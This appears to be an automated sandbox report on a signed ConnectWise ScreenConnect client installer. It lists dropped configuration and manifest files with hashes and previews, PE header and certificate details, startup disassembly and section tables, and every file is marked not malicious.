                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                      MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                      SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                      SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                      SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                      MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                      SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                      SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                      SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):87
                                                                                                                                                                                                                                                      Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                      MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                      SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                      SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                      SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1121
                                                                                                                                                                                                                                                      Entropy (8bit):5.342215969645725
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
                                                                                                                                                                                                                                                      MD5:4F13BE23AEC301E86C0DE5CB433E8C51
                                                                                                                                                                                                                                                      SHA1:1E2D836615D5F58BE6F783DE3419B72145C67328
                                                                                                                                                                                                                                                      SHA-256:B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
                                                                                                                                                                                                                                                      SHA-512:C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                      Entropy (8bit):4.296013485969038
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:W41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+WQmBMZJh1Vj+:H1/YCW2AoQ0Ni0QwMHrVi
                                                                                                                                                                                                                                                      MD5:397202F68F9AD643708425969CD4E197
                                                                                                                                                                                                                                                      SHA1:00D7C611447EEBF77A144845FF7B22AA63065991
                                                                                                                                                                                                                                                      SHA-256:00EA7CCEC1145A102052C75D8120E2ADBD94500B3D39A3EAB407ECA85DFBE2BD
                                                                                                                                                                                                                                                      SHA-512:7A7D245C31BE492E8B93A0286A41422EBEE6C5B73E87D30C76ADE2D3B75DC716E1EEC6816E2FF06B8626D647FCE6B76B262F8EDD63BFACBC186821711337569A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):6.515209803080516
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:Qjq85KfhBC.exe
                                                                                                                                                                                                                                                      File size:83'368 bytes
                                                                                                                                                                                                                                                      MD5:fdb2a84ffcb57c0bfbbf0aadb9bad790
                                                                                                                                                                                                                                                      SHA1:f3333b1aff0e5cafd2bbb96457165f231d0dc73e
                                                                                                                                                                                                                                                      SHA256:a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d
                                                                                                                                                                                                                                                      SHA512:6292d9f91891b00f8376e53444e29dc818bc72e6e756db4a1d45e037c5d35b59b453e860827026fdef7724173d775f16c0be74656e62c16f4c41178207ef532c
                                                                                                                                                                                                                                                      SSDEEP:1536:GoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdayPBJYYC79xh:OenkyfPAwiMq0RqRfbayZJYYCh
                                                                                                                                                                                                                                                      TLSH:73835B53B5D18875E9720D3118B1E9B4593FBE110EA48DAF3398422A0F351D1AE3AE7B
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                      Entrypoint:0x401489
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x6673118D [Wed Jun 19 17:12:45 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                                                                                      Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                      Signature Valid:true
                                                                                                                                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                      Error Number:0
Not Before:17/08/2022 02:00:00
Not After:16/08/2025 01:59:59
                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                      • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                      Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                      Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                      Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                      Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      call 00007F9F69139E8Ah
                                                                                                                                                                                                                                                      jmp 00007F9F6913993Fh
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                                      call dword ptr [0040B048h]
                                                                                                                                                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                      call dword ptr [0040B044h]
                                                                                                                                                                                                                                                      push C0000409h
                                                                                                                                                                                                                                                      call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                      call dword ptr [0040B050h]
                                                                                                                                                                                                                                                      pop ebp
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      sub esp, 00000324h
                                                                                                                                                                                                                                                      push 00000017h
                                                                                                                                                                                                                                                      call dword ptr [0040B054h]
                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                      je 00007F9F69139AC7h
                                                                                                                                                                                                                                                      push 00000002h
                                                                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                                                                      int 29h
                                                                                                                                                                                                                                                      mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                      mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                      mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                      mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                      mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                      mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                      mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                      mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                      mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                      mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                      mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                      mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                      pushfd
                                                                                                                                                                                                                                                      pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                      mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                      mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                      mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                      mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2da8 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0xb000 | 0x5d58 | 0x5e00 | 3a86bd3d8ffe94b1ebad64876c0f831c | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.842507933211541 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |
| DLL | Import |
|---|---|
